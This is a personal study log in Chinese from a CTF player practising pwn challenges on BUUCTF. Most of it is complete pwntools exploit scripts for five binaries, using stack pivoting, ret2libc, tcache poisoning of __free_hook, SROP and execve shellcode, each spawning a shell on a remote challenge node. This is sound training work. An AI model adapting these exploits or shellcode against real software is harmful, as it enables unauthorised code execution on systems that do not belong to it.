21.07.28学习总结
Column: July 28, 2021
Tags: learning experience
11:00-12:00: buu刷题: ciscn_2019_final_3我写的不好, 写成要爆破的了
14:25-16:30: :buu刷题: ciscn_2019_es_7: 和ciscn_2019_s_3一模一样
ciscn_2019_s_9: 写一段汇编就好了
picoctf_2018_shellcode: ret2shellcode, 我傻逼了
actf_2019_babystack: 栈迁移和ret2libc+csu, 稍微复杂点的常规题
后面一直在玩, 我忏悔
actf_2019_babystack
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ACTF_2019_babystack')
sh=remote('node4.buuoj.cn',28442)
elf=ELF('./ACTF_2019_babystack')
#context.log_level='debug'
context.binary=elf
libc=ELF('/home/thu1e/ctf/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
#libc=elf.libc
leave_ret=0x0400a18
pop_rdi=0x0400ad3
pop_rsi_r15=0x0400ad1
csu_2=0x0400AC6
csu_1=0x0400AB0
ret=0x0400709
#gdb.attach(sh, '''b *0x400ad3''')
sh.recv()
sh.sendline(str(0xe0))
sh.recvuntil('at ')
read_in_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
log.success('read in addr: '+hex(read_in_addr))
payload=p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])\
+p64(csu_2)+p64(0)+p64(0)+p64(1)+p64(elf.got['read'])+p64(0x100)\
+p64(read_in_addr+0x60)+p64(0)+p64(csu_1)
payload+=p8(0)*(0xd0-len(payload))+p64(read_in_addr-8)+p64(leave_ret)
sh.recv()
sh.send(payload)
sh.recvuntil('Byebye~\n')
leak_addr=u64(sh.recv(6).ljust(8, '\x00'))
libc_base=leak_addr-libc.sym['puts']
log.success('libc base: '+hex(libc_base))
sys_addr=libc_base+libc.sym['system']
bin_sh_addr=libc_base+libc.search('/bin/sh').next()
payload2=p64(ret)*12+p64(pop_rdi)+p64(bin_sh_addr)+p64(sys_addr)+'wwwwwwww'
sh.send(payload2)
sh.interactive()
ciscn_2019_final_3
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_final_3')
sh=remote('node4.buuoj.cn',29129)
elf=ELF('./ciscn_final_3')
libc=ELF("./libc/libc.so.6")
context.binary=elf
#context.log_level='debug'
def add(idx, size, content='/bin/sh\x00'):
sh.recv()
sh.sendline('1')
sh.sendline(str(idx))
sh.sendline(str(size))
sh.send(content)
def remove(idx):
sh.recv()
sh.sendline('2')
sh.recv()
sh.sendline(str(idx))
add(0, 0x78)
sh.recvuntil('gift :')
heap_addr=int(sh.recvuntil('\n').split('\n')[0], 16)-0xe70
log.success('heap_addr: '+hex(heap_addr))
for i in range(4):
add(i+1, 0x18)
for i in range(9):
add(i+5, 0x78)
remove(0)
remove(0)
payload1=p64(heap_addr+0xe70+0x40)
add(14, 0x78, payload1)
add(15, 0x78, payload1)
payload2=p64(0)*7+p64(0x481)
add(16, 0x78, payload2)
remove(1) #unsorted
remove(3) #tc 0x20
add(17, 0x38)
payload3=p16(((libc.sym['__free_hook'])&0xfff)+0xf000)
add(18, 0x38, payload3)
add(19, 0x18)
add(20, 0x18, p64(0))
sh.recvuntil('gift :')
free_hook_addr=int(sh.recvuntil('\n').split('\n')[0], 16)
libc_base=free_hook_addr-libc.sym['__free_hook']
log.success('libc_base: '+hex(libc_base))
add(21, 0x28)
remove(21)
remove(21)
add(22, 0x28, p64(free_hook_addr))
add(23, 0x28)
add(24, 0x28, p64(libc_base+libc.sym['system']))
remove(23)
sh.interactive()
ciscn_2019_es_7
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_2019_es_7')
sh=remote('node4.buuoj.cn',25041)
elf=ELF('./ciscn_2019_es_7')
context.binary=elf
pause()
payload1='a'*0x10+p64(elf.sym['main'])+p64(elf.sym['main'])
sh.send(payload1)
sh.recv(0x20)
leak_stack=u64(sh.recv(6).ljust(8, '\x00'))
sh.recv()
log.success('leak_stack: '+hex(leak_stack))
read_addr=leak_stack-0x138
frame=SigreturnFrame()
frame.rip=0x400517
frame.rax=59
frame.rdi=read_addr+8
frame.rdx=0
frame.rcx=0
payload2='/bin/sh\x00'*2+p64(0x04004DA)+p64(0x400517)+str(frame)
sh.send(payload2)
sh.interactive()
ciscn_2019_s_9
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./ciscn_s_9')
sh=remote('node4.buuoj.cn',25983)
elf=ELF('./ciscn_s_9')
context.binary=elf
context.log_level='debug'
shellcode1='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
shellcode2='''
sub esp, 0x28;
jmp esp;
'''
shellcode2=asm(shellcode2)
payload=shellcode1+p8(0)*(9*4-len(shellcode1))+p32(0x8048554)+shellcode2
#gdb.attach(sh)
sh.recv()
sh.sendline(payload)
sh.interactive()
picoctf_2018_shellcode
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./PicoCTF_2018_shellcode')
sh=remote('node4.buuoj.cn',29938)
elf=ELF('./PicoCTF_2018_shellcode')
context.binary=elf
context.log_level='debug'
shellcode2='\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
payload=shellcode2
sh.recv()
sh.sendline(payload)
sh.interactive()